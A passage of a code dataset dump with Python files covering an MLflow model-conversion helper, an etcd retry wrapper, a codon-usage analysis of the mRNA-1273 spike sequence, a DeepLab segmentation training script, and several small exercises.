np\nx=np.random.random(10)\ny=np.random.random(10)\nX=np.vstack([x,y])\nsk=np.var(X,axis=0,ddof=1)\nd1=np.sqrt(((x-y)**2/sk).sum())\nprint(d1)\ndef createDataSet():\n group=np.array([[1,101],[5,89],[108,5],[115,8]])\n labels=['爱情片','爱情片','动作片','动作片']\n return group,labels\nif __name__=='__main__':\n group,labels=createDataSet()\n print(\"数据样本group:\",group)\n print(\"特征标签labels:\",labels)\n","sub_path":"echarts/python/作业/CreateDataSet.py","file_name":"CreateDataSet.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"164788852","text":" # INPUTCUSTOM()\n\nimport pyinputplus as p\n\ndef addupto(num):\n numlist = list(num)\n for i, digit in enumerate(numlist):\n numlist[i] = int(digit)\n if sum(numlist) != 10:\n raise Exception('The digit must be add up to 10 and not %s.'%(sum(numlist)))\n return int(num)\n\ni = p.inputCustom(addupto)\n\n\n","sub_path":"input validation/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"112803333","text":"from functools import reduce\ndef shuffle(pairs):\n d = {}\n for pair in pairs:\n if not d.get(pair[0]):\n d[pair[0]] = []\n d[pair[0]].append(pair[1])\n return [(key, d[key]) for key in d]\n\n\"\"\"in the beginning God created the heavens and the earth Now the earth was formless and empty darkness was over the surface of the deep and the Spirit of God was hovering over the waters And God said Let there be light and there was light God saw that the light was good and he separated the light from the darkness God called the light day and the darkness he called night And there was evening and there was morning—the first day\n\"\"\"\ndef computeWordCount(text):\n mapOut = [(word.lower(),1) for word in 
text.split(' ')]\n shuffOutput = shuffle(mapOut)\n reduceOut = [(key, reduce(lambda sum, x: sum+x, value)) for (key, value) in shuffOutput]\n return reduceOut\n","sub_path":"Exercises/Exercise 6/flask-app/app/computeWordCount.py","file_name":"computeWordCount.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"344669280","text":"#!/usr/bin/env python3\n#\n# Copyright 2019 EPAM Systems\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport argparse\nimport contextlib\nimport json\nimport logging\nimport os\nimport os.path\nimport shutil\nimport sys\nimport tarfile\nfrom typing import Optional\nfrom urllib import parse\n\nimport yaml\nfrom odahuflow.sdk.gppi.executor import GPPITrainedModelBinary\nfrom odahuflow.sdk.gppi.models import OdahuflowProjectManifest, OdahuflowProjectManifestBinaries, \\\n OdahuflowProjectManifestModel, OdahuflowProjectManifestToolchain, OdahuflowProjectManifestOutput\nfrom odahuflow.sdk.models import K8sTrainer, ModelIdentity\nfrom odahuflow.sdk.models import ModelTraining\n\nfrom odahuflow.trainer.helpers.conda import run_mlflow_wrapper, update_model_conda_env\nfrom odahuflow.trainer.helpers.fs import copytree\n\nimport mlflow\nimport mlflow.models\nimport mlflow.projects\nimport mlflow.pyfunc\nimport mlflow.tracking\nfrom mlflow.tracking import set_tracking_uri, get_tracking_uri, MlflowClient\n\nMODEL_SUBFOLDER = 'odahuflow_model'\nODAHUFLOW_PROJECT_DESCRIPTION = 'odahuflow.project.yaml'\nENTRYPOINT = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'templates', 'entrypoint.py')\n\n\n\ndef parse_model_training_entity(source_file: str) -> K8sTrainer:\n \"\"\"\n Parse model training file\n \"\"\"\n logging.info(f'Parsing Model Training file: {source_file}')\n\n # Validate resource file exist\n if not os.path.exists(source_file) or not os.path.isfile(source_file):\n raise ValueError(f'File {source_file} is not readable')\n\n with open(source_file, 'r', encoding='utf-8') as mt_file:\n mt = mt_file.read()\n logging.debug(f'Content of {source_file}:\\n{mt}')\n\n try:\n mt = json.loads(mt)\n except json.JSONDecodeError:\n try:\n mt = yaml.safe_load(mt)\n except json.JSONDecodeError as decode_error:\n raise ValueError(f'Cannot decode ModelTraining resource file: {decode_error}') from decode_error\n\n return K8sTrainer.from_dict(mt)\n\n\ndef save_models(mlflow_run_id: str, model_training: ModelTraining, target_directory: str) -> None:\n \"\"\"\n Save models after run\n \"\"\"\n # Using internal API for getting store and artifacts location\n store = mlflow.tracking._get_store()\n artifact_uri = store.get_run(mlflow_run_id).info.artifact_uri\n logging.info(f\"Artifacts location detected. 
Using store {store}\")\n\n parsed_url = parse.urlparse(artifact_uri)\n if parsed_url.scheme and parsed_url.scheme != 'file':\n raise ValueError(f'Unsupported scheme of url: {parsed_url}')\n artifacts_path = parsed_url.path\n\n logging.info(f\"Analyzing directory {artifact_uri} for models\")\n artifacts_abs_paths = map(lambda path: os.path.join(artifacts_path, path), os.listdir(artifacts_path))\n found_models = list(filter(lambda path: load_pyfunc_model(path, none_on_failure=True), artifacts_abs_paths))\n\n if len(found_models) != 1:\n raise ValueError(f'Expected to find exactly 1 model, found {len(found_models)}')\n\n mlflow_to_gppi(model_training.spec.model, found_models[0], target_directory, mlflow_run_id)\n\n\ndef load_pyfunc_model(path: str, none_on_failure=False) -> Optional[mlflow.models.Model]:\n \"\"\"Loads Mlflow models with pyfunc flavor\n :param none_on_failure: return None instead of raising exception on failure\n :raises Exception: if provided path is not an MLFlow model\n \"\"\"\n try:\n mlflow_model = mlflow.models.Model.load(path)\n except Exception:\n if none_on_failure:\n return None\n raise\n\n if mlflow.pyfunc.FLAVOR_NAME not in mlflow_model.flavors.keys():\n if none_on_failure:\n return None\n raise ValueError(f\"{path} does not has {mlflow.pyfunc.FLAVOR_NAME} flavor\")\n return mlflow_model\n\n\ndef mlflow_to_gppi(model_meta: ModelIdentity, mlflow_model_path: str, gppi_model_path: str, mlflow_run_id: str):\n \"\"\"Wraps an MLFlow model with a GPPI interface\n :param model_meta: container for model name and version\n :param mlflow_model_path: path to MLFlow model\n :param gppi_model_path: path to target GPPI directory, should be empty\n :param mlflow_run_id: mlflow run id for model\n \"\"\"\n try:\n mlflow_model = load_pyfunc_model(mlflow_model_path)\n except Exception as load_exception:\n raise ValueError(f\"{mlflow_model_path} is not a MLflow model: {load_exception}\") from load_exception\n\n mlflow_target_directory = os.path.join(gppi_model_path, MODEL_SUBFOLDER)\n\n logging.info(f\"Copying MLflow model from {mlflow_model_path} to {mlflow_target_directory}\")\n\n if not os.path.exists(mlflow_target_directory):\n os.makedirs(mlflow_target_directory)\n copytree(mlflow_model_path, mlflow_target_directory)\n\n py_flavor = mlflow_model.flavors[mlflow.pyfunc.FLAVOR_NAME]\n\n env = py_flavor.get('env')\n if not env:\n raise ValueError('Unknown type of env - empty')\n\n dependencies = 'conda'\n conda_path = os.path.join(MODEL_SUBFOLDER, env)\n logging.info(f'Conda env located in {conda_path}')\n\n entrypoint_target = os.path.join(mlflow_target_directory, 'entrypoint.py')\n shutil.copyfile(ENTRYPOINT, entrypoint_target)\n\n project_file_path = os.path.join(gppi_model_path, ODAHUFLOW_PROJECT_DESCRIPTION)\n\n manifest = OdahuflowProjectManifest(\n odahuflowVersion='1.0',\n binaries=OdahuflowProjectManifestBinaries(\n type='python',\n dependencies=dependencies,\n conda_path=conda_path\n ),\n model=OdahuflowProjectManifestModel(\n name=model_meta.name,\n version=model_meta.version,\n workDir=MODEL_SUBFOLDER,\n entrypoint='entrypoint'\n ),\n toolchain=OdahuflowProjectManifestToolchain(\n name='mlflow',\n version=mlflow.__version__\n ),\n output=OdahuflowProjectManifestOutput(\n run_id=mlflow_run_id\n )\n )\n\n with open(project_file_path, 'w', encoding='utf-8') as proj_stream:\n yaml.dump(manifest.dict(), proj_stream)\n\n logging.info(\"GPPI stored. Starting GPPI validation\")\n mb = GPPITrainedModelBinary(gppi_model_path)\n mb.self_check()\n logging.info(\"GPPI is validated. 
def mlflow_to_gppi(model_meta: ModelIdentity, mlflow_model_path: str, gppi_model_path: str, mlflow_run_id: str):\n    \"\"\"Wraps an MLflow model with a GPPI interface\n    :param model_meta: container for model name and version\n    :param mlflow_model_path: path to the MLflow model\n    :param gppi_model_path: path to the target GPPI directory, should be empty\n    :param mlflow_run_id: MLflow run id for the model\n    \"\"\"\n    try:\n        mlflow_model = load_pyfunc_model(mlflow_model_path)\n    except Exception as load_exception:\n        raise ValueError(f\"{mlflow_model_path} is not an MLflow model: {load_exception}\") from load_exception\n\n    mlflow_target_directory = os.path.join(gppi_model_path, MODEL_SUBFOLDER)\n\n    logging.info(f\"Copying MLflow model from {mlflow_model_path} to {mlflow_target_directory}\")\n\n    if not os.path.exists(mlflow_target_directory):\n        os.makedirs(mlflow_target_directory)\n    copytree(mlflow_model_path, mlflow_target_directory)\n\n    py_flavor = mlflow_model.flavors[mlflow.pyfunc.FLAVOR_NAME]\n\n    env = py_flavor.get('env')\n    if not env:\n        raise ValueError('Model conda environment is not specified in the pyfunc flavor')\n\n    dependencies = 'conda'\n    conda_path = os.path.join(MODEL_SUBFOLDER, env)\n    logging.info(f'Conda env located in {conda_path}')\n\n    entrypoint_target = os.path.join(mlflow_target_directory, 'entrypoint.py')\n    shutil.copyfile(ENTRYPOINT, entrypoint_target)\n\n    project_file_path = os.path.join(gppi_model_path, ODAHUFLOW_PROJECT_DESCRIPTION)\n\n    manifest = OdahuflowProjectManifest(\n        odahuflowVersion='1.0',\n        binaries=OdahuflowProjectManifestBinaries(\n            type='python',\n            dependencies=dependencies,\n            conda_path=conda_path\n        ),\n        model=OdahuflowProjectManifestModel(\n            name=model_meta.name,\n            version=model_meta.version,\n            workDir=MODEL_SUBFOLDER,\n            entrypoint='entrypoint'\n        ),\n        toolchain=OdahuflowProjectManifestToolchain(\n            name='mlflow',\n            version=mlflow.__version__\n        ),\n        output=OdahuflowProjectManifestOutput(\n            run_id=mlflow_run_id\n        )\n    )\n\n    with open(project_file_path, 'w', encoding='utf-8') as proj_stream:\n        yaml.dump(manifest.dict(), proj_stream)\n\n    logging.info(\"GPPI stored. Starting GPPI validation\")\n    mb = GPPITrainedModelBinary(gppi_model_path)\n    mb.self_check()\n    logging.info(\"GPPI is validated. OK\")\n\n\n
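# Resulting layout (added commentary, reconstructed from the code above; directory and\n# file names come from MODEL_SUBFOLDER and ODAHUFLOW_PROJECT_DESCRIPTION):\n#\n#     <gppi_model_path>/\n#         odahuflow.project.yaml      (manifest written by yaml.dump())\n#         odahuflow_model/            (copied MLflow model plus entrypoint.py)\n#\n\n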
def get_or_create_experiment(experiment_name, artifact_location=None) -> str:\n    client = MlflowClient()\n\n    # Register the experiment on the tracking server if it does not exist yet\n    logging.info(f\"Searching for experiment with name {experiment_name}\")\n    experiment = client.get_experiment_by_name(experiment_name)\n\n    if experiment:\n        experiment_id = experiment.experiment_id\n        logging.info(f\"Experiment {experiment_id} has been found\")\n    else:\n        logging.info(f\"Creating new experiment with name {experiment_name}\")\n\n        experiment_id = client.create_experiment(experiment_name, artifact_location=artifact_location)\n\n        logging.info(f\"Experiment {experiment_id} has been created\")\n    return experiment_id\n\n\ndef train_models(model_training: ModelTraining, experiment_id: str) -> str:\n    \"\"\"\n    Start MLflow run\n    \"\"\"\n    logging.info('Downloading conda dependencies')\n    update_model_conda_env(model_training)\n\n    logging.info('Getting tracking URI')\n    tracking_uri = get_tracking_uri()\n    if not tracking_uri:\n        raise ValueError('Cannot get tracking URI')\n    logging.info(f\"Using MLflow client placed at {tracking_uri}\")\n\n    logging.info('Creating MLflow client, setting tracking URI')\n    set_tracking_uri(tracking_uri)\n\n    # Start the run and wait for it to finish\n    logging.info(f\"Starting MLflow's run function. Parameters: [project directory: {model_training.spec.work_dir}, \"\n                 f\"entry point: {model_training.spec.entrypoint}, \"\n                 f\"hyper parameters: {model_training.spec.hyper_parameters}, \"\n                 f\"experiment id={experiment_id}]\")\n\n    mlflow_input = {\n        \"uri\": model_training.spec.work_dir,\n        \"entry_point\": model_training.spec.entrypoint,\n        \"parameters\": model_training.spec.hyper_parameters,\n        \"experiment_id\": experiment_id,\n        \"backend\": 'local',\n        \"synchronous\": True,\n        \"use_conda\": False,\n    }\n\n    run_id = run_mlflow_wrapper(mlflow_input)\n\n    # TODO: refactor\n    client = MlflowClient()\n    client.set_tag(run_id, \"training_id\", model_training.id)\n    client.set_tag(run_id, \"model_name\", model_training.spec.model.name)\n    client.set_tag(run_id, \"model_version\", model_training.spec.model.version)\n\n    logging.info(f\"MLflow's run function finished. Run ID: {run_id}\")\n\n    return run_id\n\n\ndef setup_logging(args: argparse.Namespace) -> None:\n    \"\"\"\n    Set up the logging instance\n    \"\"\"\n    log_level = logging.DEBUG if args.verbose else logging.INFO\n\n    logging.basicConfig(format='[odahuflow][%(levelname)5s] %(asctime)s - %(message)s', datefmt='%d-%b-%y %H:%M:%S',\n                        level=log_level)\n\n\n@contextlib.contextmanager\ndef _remember_cwd():\n    curdir = os.getcwd()\n    try:\n        yield\n    finally:\n        os.chdir(curdir)\n\n\ndef mlflow_to_gppi_cli():\n\n    def make_dir(string):\n        try:\n            os.makedirs(string, exist_ok=True)\n        except FileExistsError as error:\n            raise ValueError(f'A file already exists with the same name: {string}\\n'\n                             'Rename file or directory and try again.') from error\n\n    def dir_type(string):\n        if not os.path.isdir(string):\n            raise ValueError(f'{string} is not a directory')\n        return string\n\n    parser = argparse.ArgumentParser(description='Converts an MLflow model to GPPI.')\n\n    parser.add_argument('--verbose', action='store_true', help='More extensive logging')\n    parser.add_argument('--model-name', type=str, required=True, help='Name of GPPI Model')\n    parser.add_argument('--model-version', type=str, required=True, help='Version of GPPI Model')\n    parser.add_argument('--mlflow-model-path', '--mlflow', required=True,\n                        type=dir_type, help='Path to source MLFlow model directory')\n    parser.add_argument('--gppi-model-path', '--gppi', required=True,\n                        type=str, help='Path to result GPPI model directory')\n    parser.add_argument('--mlflow-run-id', type=str, required=True, help='Run ID for MLFlow model')\n    parser.add_argument('--no-tgz', dest='tgz', action='store_false', help='Prevent archiving the result directory')\n    args = parser.parse_args()\n\n    setup_logging(args)\n    gppi_model_path: str = args.gppi_model_path\n\n    make_dir(gppi_model_path)\n\n    if len(os.listdir(gppi_model_path)) > 0:\n        logging.error(\"Result directory must be empty!\")\n        sys.exit(1)\n\n    try:\n        mlflow_to_gppi(model_meta=ModelIdentity(name=args.model_name.strip(), version=args.model_version.strip()),\n                       mlflow_model_path=args.mlflow_model_path,\n                       gppi_model_path=gppi_model_path,\n                       mlflow_run_id=args.mlflow_run_id)\n\n        if args.tgz:\n            with _remember_cwd(), tarfile.open(f'{gppi_model_path}.tgz', 'w:gz') as tar:  # type: tarfile.TarFile\n                os.chdir(args.gppi_model_path)\n                for s in os.listdir('.'):\n                    tar.add(s)\n            shutil.rmtree(gppi_model_path)\n\n    except Exception as e:\n        error_message = f'Exception occurred during model conversion. Message: {e}'\n\n        if args.verbose:\n            logging.exception(error_message)\n        else:\n            logging.error(error_message)\n\n        sys.exit(1)\n","sub_path":"mlflow/odahuflow/trainer/helpers/mlflow_helper.py","file_name":"mlflow_helper.py","file_ext":"py","file_size_in_byte":12051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"484172670","text":"# -*- coding: utf-8 -*-\n\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom __future__ import absolute_import\n\nimport functools\nimport logging\nimport operator\nimport time\n\nimport etcd\n\nfrom entrypoint.args import VARIABLES\n\nLOG = logging.getLogger(__name__)\n\n\ndef retry(f):\n    @functools.wraps(f)\n    def decorate(*args, **kwargs):\n        attempts = VARIABLES[\"etcd\"][\"attempts\"]\n        attempts_delay = VARIABLES[\"etcd\"][\"attempts_delay\"]\n        for i in range(attempts):\n            try:\n                return f(*args, **kwargs)\n            except etcd.EtcdException as e:\n                LOG.warning(\"Etcd fails with error on attempt %s/%s: %s\",\n                            i + 1, attempts, str(e))\n                time.sleep(attempts_delay)\n        return f(*args, **kwargs)\n    return decorate\n\n\n
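# Added note on retry semantics (commentary, not original code): the loop makes up to\n# 'attempts' guarded calls and, if every one of them raises etcd.EtcdException, performs\n# one final unguarded call whose exception propagates to the caller. With attempts = 3 the\n# wrapped function is therefore invoked at most 4 times. Illustrative use on a\n# hypothetical helper:\n#\n#     @retry\n#     def fetch_config():\n#         return get_etcd_client().read('/config')\n#\n\n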
@retry\ndef get_etcd_client():\n    hosts = list(map(operator.itemgetter(\"address\", \"port\"),\n                     VARIABLES[\"etcd\"][\"endpoint\"]))\n    hosts_str = \",\".join(\"{0}:{1}\".format(*host) for host in hosts)\n    LOG.debug(\"Using the following etcd hosts: %s\", hosts_str)\n    client = etcd.Client(host=tuple(hosts), allow_reconnect=True,\n                         read_timeout=5)\n    return client\n","sub_path":"entrypoint/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"130640527","text":"# Analysis of the SARS CoV 2 Spike protein in an attempt to replicate the mRNA-1273 sequence\n# 08.05.2021 - Zachary Sykes\n\nimport os\nfrom Bio.Seq import Seq\nfrom Bio.SeqUtils import GC123\n\nfrom file_handling import data_extraction\nfrom file_handling import file_output\n\n# PATHs set\nproj_path = os.path.abspath(os.getcwd())\nsars_cov_2_aa = os.path.join(proj_path, 'SARS_CoV_2_aaSeq/')  # SARS CoV 2 S protein sequences\nmrna_1273_sequence = os.path.join(proj_path, 'mrna1273_fastaSeq/')  # mRNA-1273 fasta file\n\n# Human codon table\nhsap_codon_table = {'F': ['TTT', 'TTC'],\n                    'L': ['TTA', 'TTG', 'CTT', 'CTC', 'CTA', 'CTG'],\n                    'S': ['TCT', 'TCC', 'TCA', 'TCG', 'AGT', 'AGC'],\n                    'Y': ['TAT', 'TAC'], '*': ['TAA', 'TAG', 'TGA'],\n                    'C': ['TGT', 'TGC'], 'W': ['TGG'],\n                    'P': ['CCT', 'CCC', 'CCA', 'CCG'],\n                    'H': ['CAT', 'CAC'], 'Q': ['CAA', 'CAG'],\n                    'R': ['CGT', 'CGC', 'CGA', 'CGG', 'AGA', 'AGG'],\n                    'I': ['ATT', 'ATC', 'ATA'], 'M': ['ATG'],\n                    'T': ['ACT', 'ACC', 'ACA', 'ACG'],\n                    'N': ['AAT', 'AAC'], 'K': ['AAA', 'AAG'],\n                    'V': ['GTT', 'GTC', 'GTA', 'GTG'],\n                    'A': ['GCT', 'GCC', 'GCA', 'GCG'],\n                    'D': ['GAT', 'GAC'], 'E': ['GAA', 'GAG'],\n                    'G': ['GGT', 'GGC', 'GGA', 'GGG']}\n\n\n# Builds a dynamic codon table based on the codons present in the NT sequence\n# Takes an NT sequence (str or Biopython Seq) and a codon table dict mapping amino acids to codons\ndef codon_counter(nt, codons, nt_type='dna'):\n\n    # Stores codons used for each amino acid and frequency used for said amino acid\n    codon_table = dict()\n\n    # Grabs the key (aa) for the given value (codon)\n    def get_key(val):\n        for key, value in codons.items():\n            if val in value:\n                return key\n\n    # Handles an RNA string passed to the codon counter\n    if nt_type == 'rna' and type(nt) is not Seq:\n        nt = Seq(nt)\n        nt = nt.back_transcribe()\n    elif nt_type == 'rna' and type(nt) is Seq:\n        nt = nt.back_transcribe()\n\n    start = None\n    stop = None\n\n    # Start and stop codons identified for the sequence\n    for frame in range(0, len(nt), 3):\n        if nt[frame: frame + 3] == 'ATG' and not start:\n            print(f'Start codon {nt[frame: frame + 3]} identified at position {frame}')\n            start = frame\n        # mRNA-1273 contains all three stop codons at the end of the sequence\n        # TAG was the last one before the 3' UTR 
so all stop codons included in the codon table\n if nt[frame: frame + 3] == 'TAG' and not stop:\n print(f'Stop codon {nt[frame: frame + 3]} identified at position {frame}')\n stop = frame + 3\n\n # Trimmed nt sequence starting at ATG and ending at TAG\n nt_cds = nt[start:stop]\n prev_codon = ''\n # Counting codons used per amino acid\n for frame in range(3, (len(nt_cds) + 3), 3):\n aa = get_key(nt_cds[frame - 3: frame])\n codon_table.setdefault(aa, []).append(str(nt_cds[frame - 3: frame]))\n\n # Returns a list of tuples (codon, num times used to translate aa in nt seq provided / total codons for aa)\n for aa in codon_table.keys():\n codon_counts = {aa: [(codon, round(codon_table[aa].count(codon) / len(codon_table[aa]), 3))\n for codon in set(codon_table[aa])]}\n codon_table.update(codon_counts)\n print(GC123(nt_cds))\n\n return codon_table\n\n\n# Storing AA and NT sequence data for SARS CoV 2 Spike protein\naa_seq = data_extraction(sars_cov_2_aa, 'sars_cov_2_aa.fasta')\nmrna1273_dna_seq = data_extraction(mrna_1273_sequence, 'mrna1273_spike_encoding.fasta')\n\n# Substituting the 2 proline at residues 986 and 987 to spike protein sequence\naa_s2p_seq = aa_seq[0][:985] + 'PP' + aa_seq[0][987:]\nfile_output(\n sars_cov_2_aa,\n 'sars_cov_2_s2p_aa.fasta',\n f'{aa_seq[1]}_S2P_986|987',\n aa_s2p_seq\n) # Copy of S2P variant saved to disk\n\n\n# Generating a codon table with frequencies of use from an NT sequence\n# Codon table passed is the human codon/amino acid associations table\n# NT sequence is mRNA-1273 encoding the S2P perfusion stabilized variant of the SARS-CoV-2 spike protein\nfor k, v in codon_counter(mrna1273_dna_seq[0], hsap_codon_table).items():\n print(k, v)\n\n# NOTE - There is a preferred codon for each amino acid in the encoded in mRNA-1273\n# NOTE - In very low frequency a synonymous codon is selected.\n# NOTE - Multiple readings on degenerate codons usage across genomes leads me to believe that the reason\n# NOTE - for the low frequency synonymous codon usage is due to regional GC content\n","sub_path":"sars_cov2_mrna1273_reverse_engineer.py","file_name":"sars_cov2_mrna1273_reverse_engineer.py","file_ext":"py","file_size_in_byte":4672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"120675099","text":"def project(data,dic,column,table):\n array=[]\n index=0\n for x in data:\n if data[x]['name']==table:\n for y in data[x]['columns']:\n if y==column:\n index=data[x]['columns'].index(y)\n for y in data[x]['values']:\n array.append(y[index])\n new_array=[]\n if dic['distinct']==1:\n for i in array:\n if i not in new_array:\n new_array.append(i)\n else:\n new_array=array\n print(column)\n for x in new_array:\n print(x)\n","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"128490530","text":"#Notice for deeplabv2\n# Image scale to [-127, 128]\n\nimport sys, os\nimport torch\nimport argparse\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.models as models\n\nfrom torch.autograd import Variable\nfrom torch.utils import data\nfrom tqdm import tqdm\n\nfrom ptsemseg.models import get_model\nfrom ptsemseg.loader import get_loader, get_data_path\nfrom ptsemseg.metrics import runningScore\nfrom ptsemseg.loss import *\nfrom ptsemseg.augmentations import *\nfrom tqdm import tqdm\nfrom pytorchgo.utils import logger\nfrom pytorchgo.utils.pytorch_utils 
import optimizer_summary\nfrom pytorchgo.utils.learning_rate import adjust_learning_rate\n\nfrom pytorchgo.loss import CrossEntropyLoss2d_Seg\n\nis_debug = 0\n\ntrain_img_shape = (473, 473)\n\ndef train(args):\n\n    logger.auto_set_dir()\n    from pytorchgo.utils.pytorch_utils import set_gpu\n    set_gpu(args.gpu)\n\n\n    # Setup Dataloader\n    from pytorchgo.augmentation.segmentation import SubtractMeans, PIL2NP, RGB2BGR, PIL_Scale, Value255to0, ToLabel\n    from torchvision.transforms import Compose, Normalize, ToTensor\n    img_transform = Compose([  # notice the order!!!\n        PIL_Scale(train_img_shape, Image.BILINEAR),\n        PIL2NP(),\n        RGB2BGR(),\n        SubtractMeans(),\n        ToTensor(),\n    ])\n\n    label_transform = Compose([\n        PIL_Scale(train_img_shape, Image.NEAREST),\n        PIL2NP(),\n        Value255to0(),\n        ToLabel()\n\n    ])\n\n    val_img_transform = Compose([\n        PIL_Scale(train_img_shape, Image.BILINEAR),\n        PIL2NP(),\n        RGB2BGR(),\n        SubtractMeans(),\n        ToTensor(),\n    ])\n    val_label_transform = Compose([PIL_Scale(train_img_shape, Image.NEAREST),\n                                   PIL2NP(),\n                                   ToLabel(),\n                                   # notice here, training, validation size difference, this is very tricky.\n                                   ])\n\n    from pytorchgo.dataloader.pascal_voc_loader import pascalVOCLoader as common_voc_loader\n    train_loader = common_voc_loader(split=\"train_aug\", epoch_scale=1, img_transform=img_transform, label_transform=label_transform)\n\n    n_classes = train_loader.n_classes\n    trainloader = data.DataLoader(train_loader, batch_size=args.batch_size, num_workers=8, shuffle=True)\n\n    validation_loader = common_voc_loader(split='val', img_transform=val_img_transform, label_transform=val_label_transform)\n    valloader = data.DataLoader(validation_loader, batch_size=args.batch_size, num_workers=8)\n\n    # Setup Metrics\n    running_metrics = runningScore(n_classes)\n\n\n    # Setup Model\n    from pytorchgo.model.deeplabv1 import VGG16_LargeFoV\n    from pytorchgo.model.deeplab_resnet import Res_Deeplab\n\n    model = Res_Deeplab(NoLabels=n_classes, pretrained=True, output_all=False)\n\n    from pytorchgo.utils.pytorch_utils import model_summary, optimizer_summary\n    model_summary(model)\n\n\n\n\n    def get_validation_miou(model):\n        model.eval()\n        for i_val, (images_val, labels_val) in tqdm(enumerate(valloader), total=len(valloader), desc=\"validation\"):\n            if i_val > 5 and is_debug == 1: break\n            if i_val > 200 and is_debug == 2: break\n\n            #img_large = torch.Tensor(np.zeros((1, 3, 513, 513)))\n            #img_large[:, :, :images_val.shape[2], :images_val.shape[3]] = images_val\n\n            output = model(Variable(images_val, volatile=True).cuda())\n            pred = output.data.max(1)[1].cpu().numpy()\n            #pred = output[:, :images_val.shape[2], :images_val.shape[3]]\n\n            gt = labels_val.numpy()\n\n            running_metrics.update(gt, pred)\n\n        score, class_iou = running_metrics.get_scores()\n        for k, v in score.items():\n            logger.info(\"{}: {}\".format(k, v))\n        running_metrics.reset()\n        return score['Mean IoU : \\t']\n\n\n    model.cuda()\n\n    # Check if model has a custom optimizer / loss\n    if hasattr(model, 'optimizer'):\n        optimizer = model.module.optimizer\n    else:\n        logger.warn(\"model doesn't have a customized optimizer, using the default SGD setting!\")\n        optimizer = torch.optim.SGD(model.optimizer_params(args.l_rate), lr=args.l_rate, momentum=0.99, weight_decay=5e-4)\n\n    optimizer_summary(optimizer)\n    if args.resume is not None:\n        if os.path.isfile(args.resume):\n            logger.info(\"Loading model and optimizer from checkpoint '{}'\".format(args.resume))\n            checkpoint = torch.load(args.resume)\n            model.load_state_dict(checkpoint['model_state'])\n            optimizer.load_state_dict(checkpoint['optimizer_state'])\n            logger.info(\"Loaded checkpoint '{}' (epoch {})\"\n                        .format(args.resume, checkpoint['epoch']))\n        else:\n            logger.info(\"No checkpoint found at '{}'\".format(args.resume))\n\n
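    # Added note (commentary): adjust_learning_rate in the loop below applies the usual\n    # poly schedule, lr(t) = l_rate * (1 - t / T) ** 0.9 with T = n_epoch * len(trainloader).\n    # For the default l_rate = 2.5e-4 this gives roughly 1.3e-4 halfway through training\n    # and decays to 0 at the final iteration.\n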
    best_iou = 0\n    logger.info('start!!')\n    for epoch in tqdm(range(args.n_epoch), total=args.n_epoch):\n        model.train()\n        for i, (images, labels) in tqdm(enumerate(trainloader), total=len(trainloader), desc=\"training epoch {}/{}\".format(epoch, args.n_epoch)):\n            if i > 10 and is_debug == 1: break\n\n            if i > 200 and is_debug == 2: break\n\n            cur_iter = i + epoch * len(trainloader)\n            cur_lr = adjust_learning_rate(optimizer, args.l_rate, cur_iter, args.n_epoch * len(trainloader), power=0.9)\n\n\n            images = Variable(images.cuda())\n            labels = Variable(labels.cuda())\n\n            optimizer.zero_grad()\n            outputs = model(images)  # use fusion score\n            loss = CrossEntropyLoss2d_Seg(input=outputs, target=labels, class_num=n_classes)\n\n            #for i in range(len(outputs) - 1):\n            #for i in range(1):\n            #    loss = loss + CrossEntropyLoss2d_Seg(input=outputs[i], target=labels, class_num=n_classes)\n\n            loss.backward()\n            optimizer.step()\n\n\n            if (i + 1) % 100 == 0:\n                logger.info(\"Epoch [%d/%d] Loss: %.4f, lr: %.7f, best mIoU: %.7f\" % (epoch + 1, args.n_epoch, loss.data[0], cur_lr, best_iou))\n\n\n        cur_miou = get_validation_miou(model)\n        if cur_miou >= best_iou:\n            best_iou = cur_miou\n            state = {'epoch': epoch + 1,\n                     'mIoU': best_iou,\n                     'model_state': model.state_dict(),\n                     'optimizer_state': optimizer.state_dict(),}\n            torch.save(state, os.path.join(logger.get_logger_dir(), \"best_model.pth\"))\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description='Hyperparams')\n    parser.add_argument('--arch', nargs='?', type=str, default='deeplabv1',\n                        help='Architecture to use [\\'fcn8s, unet, segnet etc\\']')\n    parser.add_argument('--dataset', nargs='?', type=str, default='pascal',\n                        help='Dataset to use [\\'pascal, camvid, ade20k etc\\']')\n\n    parser.add_argument('--n_epoch', nargs='?', type=int, default=16,\n                        help='# of the epochs')\n    parser.add_argument('--batch_size', nargs='?', type=int, default=3,\n                        help='Batch Size')\n    parser.add_argument('--l_rate', nargs='?', type=float, default=2.5e-4,  # original implementation of deeplabv1 learning rate is 1e-3 and poly update\n                        help='Learning Rate')\n    